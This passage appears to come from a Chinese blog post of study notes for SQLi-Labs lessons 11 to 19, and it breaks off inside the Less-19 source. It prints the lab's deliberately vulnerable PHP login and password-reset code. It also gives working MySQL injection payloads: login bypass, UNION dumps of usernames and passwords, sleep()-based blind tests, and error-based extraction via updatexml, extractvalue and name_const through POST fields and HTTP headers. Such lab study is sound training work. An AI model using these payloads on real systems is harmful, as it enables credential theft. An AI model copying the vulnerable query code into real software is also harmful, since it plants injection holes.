SQLi-Labs 学习笔记(Less 11-20)
来源:互联网 发布:透视衣服软件 编辑:程序博客网 时间:2024/05/17 02:51
SQLi-Labs 学习笔记
SQL 百度百科:结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言。对于初学者,数据库仅仅是在客户端和服务端进行数据存储。SQL通过结构化查询,关系,面向对象编程等等来管理数据库。编程极客们总是搞出许多这样类型的软件,像MySQL,MS SQL ,Oracle以及Postgresql。现在有一些程序能让我们有能力通过结构化查询来管理大型数据库。
SQLi Labs下载地址:https://github.com/Audi-1/sqli-labs
ps:以下的内容有些是我从别人经验当中摘抄下来的,有些是我自己写的,我把四面八方的经验总结起来给大家,也为了提升自己的技术,如有疑问请在评论区提问,谢谢。
Less-11 基于错误的POST型单引号字符型注入
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-11- Error Based- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div> <div> Password : <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname);fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
我们来看一下这次是什么类型的提交,以及提交的字段是什么,打开网络查看器查看
答案是POST提交,提交的字段是uname和passwd,那么我们加一个单引号让它报错:
我们把 整个被单引号引着的复制下来,把左端和右端的单引号去掉,就变成下面的:
test' LIMIT 0,1
那么可以判断是单引号注入类型了,接下来构建 POST 提交:
uname=user' or 1=1 #&passwd=user'
拿到用户名和密码了,登陆一下,成功登陆,当然除了用注释还可以闭合单引号,当这里有个问题探讨,看下图
没有显示出来?我们看下 Sql 语句是什么样的:
SELECT username,password From users WHERE username='user' or '1'='1' and password='user' LIMIT 0,1
首先and的优先级高于or 【就是and先运算】,那么 '1'='1' and password='user' 先运算,因为users表里面的password字段没有一个数据是user,右边是false,那么整个表达式就是false,那么语句就变成:
SELECT username, password FROM users WHERE username='user' or false
所以我们要怎么办呢,uname这里不行,我们尝试passwd,发现是可以的
对应的SQL语句是:
SELECT username,password FROM users WHERE username='user' and password='user' or '1'='1' LIMIT 0,1
左边是FALSE,or 右边是true,当然就绕过了,一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的。
接下类我们就可以使用 联合查询来看下数据库的信息:
构建如下 POST字段:
uname=user&passwd=user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#
当然,想用盲注也可以,就是要写脚本
uname=user&passwd=user' or length(database())=8#
Less-12基于错误的双引号POST型字符型变形的注入
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-12- Error Based- Double quotes- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div> <div> Password : <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
先用什么单引号双引号看看,报错就看出它有没有用引号,或者加了其他东西
那么这里明显看出用)将变量括着,那么直接绕过,构建 POST 字段:
uname=abc&passwd=abc") or 1=1#
Less-13POST单引号变形双注入
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-13- Double Injection- String- with twist</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div> <div> Password : <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];//echo "<br>";//echo 'Your Password:' .$row['password'];//echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
没多少区别,之前也讲过了,根据判断可以得知是 (' $id ') 类型的,那么
Less-14POST单引号变形双注入
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-14- Double Injection- Double quotes- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div> <div> Password : <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];//echo "<br>";//echo 'Your Password:' .$row['password'];//echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
单引号没报错,双引号就报错了,然后就不说了,都懂
Less-15基于bool型/时间延迟单引号POST型盲注
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-15- Blind- Boolian Based- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div> <div> Password : <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname);fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];echo "<br>";//echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";//print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
这里输入单引号,双引号就不会报错了,用时间延迟函数了,先确定是单引号盲注:
ok,没错。
Less-16基于bool型/时间延迟的双引号POST型盲注
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-16- Blind- Time Based- Double quotes- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/></div> <div> Password : <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ //echo '<font color= "#0000ff">'; echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];echo "<br>";//echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />'; echo "</font>"; }else {echo '<font color= "#0000ff" font size="3">';echo "</br>";echo "</br>";//echo "Try again looser";//print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
uname=a&passwd=a") or 1=1# ,判断为双引号变形,测试:
uname=a&passwd=a") or if(length(database())=7,1,sleep(5)) #
uname=a&passwd=a") or if(length(database())=8,1,sleep(5)) #
Less-17基于错误的更新查询POST注入
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-17 Update Query- Error based - String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font> <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --><form action="" name="form1" method="post"> <div style="margin-top:15px; height:30px;">User Name : <input type="text" name="uname" value=""/> </div> <div> New Password : <input type="text" name="passwd" value=""/></div></br> <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,15);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){//making sure uname is not injectable$uname=check_input($_POST['uname']); $passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'New Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);//echo $row;if($row){ //echo '<font color= "#0000ff">';$row1 = $row['username']; //echo 'Your Login name:'. $row1;$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";mysql_query($update); echo "<br>";if (mysql_error()){echo '<font color= "#FFFF00" font size = 3 >';print_r(mysql_error());echo "</br></br>";echo "</font>";}else{echo '<font color= "#FFFF00" font size = 3 >';//echo " You password has been successfully updated " ;echo "<br>";echo "</font>";}echo '<img src="../images/flag1.jpg" />';//echo 'Your Password:' .$row['password']; echo "</font>"; }else {echo '<font size="4.5" color="#FFFF00">';//echo "Bug off you Silly Dumb hacker";echo "</br>";echo '<img src="../images/slap1.jpg" />';echo "</font>"; }}?></font></div></body></html>
来分析一下代码,他的大概执行过程是接收到username和password后,首先根据username的值查询数据库返回username和password,然后再将原有的password值用接收到的值替换掉,这里有一个问题是,username在接收时用了一个自定义的过滤函数check_input(),这个函数首先做了判空处理,合法就截取username的前15个字符,然后是通过get_magic_quotes_gpc()的返回值判断magic_quotes_gpc的值是on还是off:
magic_quotes_gpc=on时, 不用对输入和输出数据库的字符串数据作addslashes()和stripslashes()的操作,数据也会正常显示。如果此时对输入的数据作了addslashes()处理,那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。
magic_quotes_gpc=off 时,必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出,因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行。
最后,他用了ctype_digit()判断username值的类型是否是数字,是字符就用mysql_real_escape_string对特殊字符进行转义
显然,username这里并不好注入,只有通过弱口令爆破,像是admin之类的,但是他对password的接收没有做过滤的处理,于是我们可以在这里动手脚
$uname=check_input($_POST['uname']); $passwd=$_POST['passwd'];
对于update的注入有几种思路,我们将他连同insert和delete一起来总结一下:
1、子查询注入
子查询注入原理即双注入,对于dateup、delete和insert通常都是结合or的逻辑判断,本题为例我们对update可以构造如下语句
获取数据库名:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取表名:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取字段名:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取用户信息,这里不知道为什么执行不成功:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
如果有哪位朋友知道怎么解决,麻烦在下面评论区提出解决方法,有可能是我mysql版本的问题吧。
2、通过name_const():
name_const(name,value):返回给定值,当用来产生一个结果集合列时, name_const()促使该列使用给定名称,
但他的使用范围受限,只适用于一些数据库版本高于5.0.12,但又稍旧的版本,像现在的5.7版本就不用想了...然而我用的就是较新的版本,注入只能显示数据库的版本信息,想要查询其他的信息,会显示Incorrect arguments to NAME_CONST,所以,这里我就不截图了,直接放payload:
uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
uname=admin&passwd=1' or (select * from (select(name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1))a)
总的来说,对于update,insert和delete都有一个固定的结构:... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...
3、通过updatexml():payload:updatexml(1,concat(0x7e,(version())),0)
updatexml(xml_target,xpath_expr,new_xml)函数:
第一个参数是 目标xml
第二个参数是 xpath的表达式,这个看w3c那个xpath教程
第三个参数是 要将xpath的表达式的东西将目标xml替换成什么
xpath教程看这 http://www.w3school.com.cn/xpath/
xml_target和new_xml参数随便设定一个数就行,这里主要让他报错
首先获取数据库名:
uname=admin&passwd=' or updatexml(1,concat(0x7e,concat(database()),0x7e),1)#
获取表名:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
获取字段名:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
获取用户信息,当然这里也失败了:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e),0)#
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(select b.n from (select concat_ws(char(32,44,32),id,username,password) n from users u where u.id=1)b)),0) or'', 'Nervo');
4、通过extractvalue():
extractvalue(xml,value)函数也是MYSQL5.1以后推出的对XML文档数据进行查询和修改的XPATH函数,注入时第一个参数随便给一个数字。直接上payload:
uname=admin&passwd=' or extractvalue(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e))%23
Less-18基于错误的用户代理,头部POST注入
①先打开网页查看 Welcome Dhakkan
②查看源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-18 Header Injection- Error Based- string</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --><form action="" name="form1" method="post"> <div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> </div> <div> Password : <input type="text" name="passwd" value=""/></div></br> <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="3" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,20);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}$uagent = $_SERVER['HTTP_USER_AGENT'];$IP = $_SERVER['REMOTE_ADDR'];echo "<br>";echo 'Your IP ADDRESS is: ' .$IP;echo "<br>";//echo 'Your User Agent is: ' .$uagent;// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);/*echo 'Your Your User name:'. $uname;echo "<br>";echo 'Your Password:'. $passwd;echo "<br>";echo 'Your User Agent String:'. $uagent;echo "<br>";echo 'Your User Agent String:'. $IP;*///logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Agent:'.$uname."\n");fclose($fp);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){echo '<font color= "#FFFF00" font size = 3 >';$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";mysql_query($insert);//echo 'Your IP ADDRESS is: ' .$IP;echo "</font>";//echo "<br>";echo '<font color= "#0000ff" font size = 3 >';echo 'Your User Agent is: ' .$uagent;echo "</font>";echo "<br>";print_r(mysql_error());echo "<br><br>";echo '<img src="../images/flag.jpg" />';echo "<br>";}else{echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>"; }}?></font></div></body></html>
对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的,但
是在代码中,我们看到了insert()
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?Ip地址我们这里修改不是很方便,但是useragent修改较为方便,我们从useragent入手。
那么用什么工具手注呢,burp的repeater非常方便,用火狐的某些插件应该也可以如live http headers,tamper data,下面我用 burp suite 来演示
首先这里要输入正确的账号和密码才能绕过账号密码判断,进入处理uagent部分,这里跟我们现实中的注册登录再注入是比较贴合,这里我们输入正确的账号密码就输出我们的uagent
接下来,利用 Burp suite 抓包改包,获取数据库名称,有很多种方式,构建语句:
' or updatexml(1,concat(0x2b5e,database()),0) or '‘and extractvalue(1,concat(0x7e,(database())) and ‘1‘=‘1
就不按步骤来了,直接获取用户名和密码信息:
' or updatexml(1,concat(0x2b5e,(select concat_ws(0x2b5e,id,username,password) from users limit 0,1)),0) or '
Less-19基于头部的Referer POST报错
①先打开网页查看 Welcome Dhakkan
②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-19 Header Injection- Referer- Error Based- string</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div><div align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --><form action="" name="form1" method="post"> <div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> </div> <div> Password : <input type="text" name="passwd" value=""/></div></br> <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="3" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,20);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}$uagent = $_SERVER['HTTP_REFERER'];$IP = $_SERVER['REMOTE_ADDR'];echo "<br>";echo 'Your IP ADDRESS is: ' .$IP;echo "<br>";//echo 'Your User Agent is: ' .$uagent;// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);/*echo 'Your Your User name:'. $uname;echo "<br>";echo 'Your Password:'. $passwd;echo "<br>";echo 'Your User Agent String:'. $uagent;echo "<br>";echo 'Your User Agent String:'. $IP;*///logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'Referer:'.$uname."\n");fclose($fp);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){echo '<font color= "#FFFF00" font size = 3 >';$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";mysql_query($insert);//echo 'Your IP ADDRESS is: ' .$IP;echo "</font>";//echo "<br>";echo '<font color= 